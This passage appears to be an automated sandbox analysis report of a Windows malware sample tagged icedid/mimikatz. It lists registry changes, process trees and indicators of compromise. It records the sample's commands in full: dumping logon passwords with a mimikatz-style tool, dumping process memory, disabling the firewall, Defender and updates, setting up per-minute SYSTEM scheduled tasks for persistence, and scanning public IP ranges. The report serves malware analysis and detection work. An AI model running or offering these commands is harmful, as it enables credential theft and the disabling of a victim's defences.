\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing simzbkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" simzbkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" simzbkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" simzbkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe -
Modifies registry class 14 IoCs
Processes:
simzbkl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" simzbkl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
simzbkl.exepid process 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exepid process 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exesimzbkl.exesimzbkl.exevfshost.exevmebnmlbn.exegzbahn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exedescription pid process Token: SeDebugPrivilege 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 5100 simzbkl.exe Token: SeDebugPrivilege 1836 simzbkl.exe Token: SeDebugPrivilege 2776 vfshost.exe Token: SeDebugPrivilege 3224 vmebnmlbn.exe Token: SeLockMemoryPrivilege 2172 gzbahn.exe Token: SeLockMemoryPrivilege 2172 gzbahn.exe Token: SeDebugPrivilege 4680 vmebnmlbn.exe Token: SeDebugPrivilege 60 vmebnmlbn.exe Token: SeDebugPrivilege 2344 vmebnmlbn.exe Token: SeDebugPrivilege 440 vmebnmlbn.exe Token: SeDebugPrivilege 4156 vmebnmlbn.exe Token: SeDebugPrivilege 3752 vmebnmlbn.exe Token: SeDebugPrivilege 4568 vmebnmlbn.exe Token: SeDebugPrivilege 4088 vmebnmlbn.exe Token: SeDebugPrivilege 2876 vmebnmlbn.exe Token: SeDebugPrivilege 1048 vmebnmlbn.exe Token: SeDebugPrivilege 4692 vmebnmlbn.exe Token: SeDebugPrivilege 1652 vmebnmlbn.exe Token: SeDebugPrivilege 1488 vmebnmlbn.exe Token: SeDebugPrivilege 4332 vmebnmlbn.exe Token: SeDebugPrivilege 1988 vmebnmlbn.exe Token: SeDebugPrivilege 2248 vmebnmlbn.exe Token: SeDebugPrivilege 3572 vmebnmlbn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exesimzbkl.exesimzbkl.exexohudmc.exenslfoo.exesimzbkl.exesimzbkl.exepid process 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe 5100 simzbkl.exe 5100 simzbkl.exe 1836 simzbkl.exe 1836 simzbkl.exe 1180 xohudmc.exe 2776 nslfoo.exe 2016 simzbkl.exe 2016 simzbkl.exe 5508 simzbkl.exe 5508 simzbkl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.execmd.exesimzbkl.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 456 wrote to memory of 3560 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe cmd.exe PID 456 wrote to memory of 3560 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe cmd.exe PID 456 wrote to memory of 3560 456 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe cmd.exe PID 3560 wrote to memory of 3064 3560 cmd.exe PING.EXE PID 3560 wrote to memory of 3064 3560 cmd.exe PING.EXE PID 3560 wrote to memory of 3064 3560 cmd.exe PING.EXE PID 3560 wrote to memory of 5100 3560 cmd.exe simzbkl.exe PID 3560 wrote to memory of 5100 3560 cmd.exe simzbkl.exe PID 3560 wrote to memory of 5100 3560 cmd.exe simzbkl.exe PID 1836 wrote to memory of 5012 1836 simzbkl.exe cmd.exe PID 1836 wrote to memory of 5012 1836 simzbkl.exe cmd.exe PID 1836 wrote to memory of 5012 1836 simzbkl.exe cmd.exe PID 5012 wrote to memory of 4880 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 4880 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 4880 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 3760 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 3760 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 3760 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 3976 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 3976 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 3976 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 4868 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 4868 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 4868 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 1636 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 1636 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 1636 5012 cmd.exe cmd.exe PID 5012 wrote to memory of 5076 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 5076 5012 cmd.exe cacls.exe PID 5012 wrote to memory of 5076 5012 cmd.exe cacls.exe PID 1836 wrote to memory of 4744 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 4744 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 4744 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2016 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2016 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2016 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2376 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2376 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 2376 1836 simzbkl.exe netsh.exe PID 1836 wrote to memory of 804 1836 simzbkl.exe cmd.exe PID 1836 wrote to memory of 804 1836 simzbkl.exe cmd.exe PID 1836 wrote to memory of 804 1836 simzbkl.exe cmd.exe PID 804 wrote to memory of 4304 804 cmd.exe wpcap.exe PID 804 wrote to memory of 4304 804 cmd.exe wpcap.exe PID 804 wrote to memory of 4304 804 cmd.exe wpcap.exe PID 4304 wrote to memory of 1092 4304 wpcap.exe net.exe PID 4304 wrote to memory of 1092 4304 wpcap.exe net.exe PID 4304 wrote to memory of 1092 4304 wpcap.exe net.exe PID 1092 wrote to memory of 808 1092 net.exe net1.exe PID 1092 wrote to memory of 808 1092 net.exe net1.exe PID 1092 wrote to memory of 808 1092 net.exe net1.exe PID 4304 wrote to memory of 1960 4304 wpcap.exe net.exe PID 4304 wrote to memory of 1960 4304 wpcap.exe net.exe PID 4304 wrote to memory of 1960 4304 wpcap.exe net.exe PID 1960 wrote to memory of 3200 1960 net.exe net1.exe PID 1960 wrote to memory of 3200 1960 net.exe net1.exe PID 1960 wrote to memory of 3200 1960 net.exe net1.exe PID 4304 wrote to memory of 628 4304 wpcap.exe net.exe PID 4304 wrote to memory of 628 4304 wpcap.exe net.exe PID 4304 wrote to memory of 628 4304 wpcap.exe net.exe PID 628 wrote to memory of 1844 628 net.exe net1.exe PID 628 wrote to memory of 1844 628 net.exe net1.exe PID 628 wrote to memory of 1844 628 net.exe net1.exe PID 4304 wrote to memory of 3944 4304 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\bvzeemvvy\gzbahn.exe"C:\Windows\TEMP\bvzeemvvy\gzbahn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tbzbbivf\simzbkl.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\tbzbbivf\simzbkl.exeC:\Windows\tbzbbivf\simzbkl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\tbzbbivf\simzbkl.exeC:\Windows\tbzbbivf\simzbkl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exeC:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt2⤵
-
C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exeC:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gtuqsjqjh\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\gtuqsjqjh\Corporate\vfshost.exeC:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 780 C:\Windows\TEMP\gtuqsjqjh\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 384 C:\Windows\TEMP\gtuqsjqjh\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2096 C:\Windows\TEMP\gtuqsjqjh\2096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2744 C:\Windows\TEMP\gtuqsjqjh\2744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2756 C:\Windows\TEMP\gtuqsjqjh\2756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3068 C:\Windows\TEMP\gtuqsjqjh\3068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2536 C:\Windows\TEMP\gtuqsjqjh\2536.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3892 C:\Windows\TEMP\gtuqsjqjh\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3108 C:\Windows\TEMP\gtuqsjqjh\3108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2708 C:\Windows\TEMP\gtuqsjqjh\2708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3952 C:\Windows\TEMP\gtuqsjqjh\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4476 C:\Windows\TEMP\gtuqsjqjh\4476.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2208 C:\Windows\TEMP\gtuqsjqjh\2208.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4932 C:\Windows\TEMP\gtuqsjqjh\4932.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
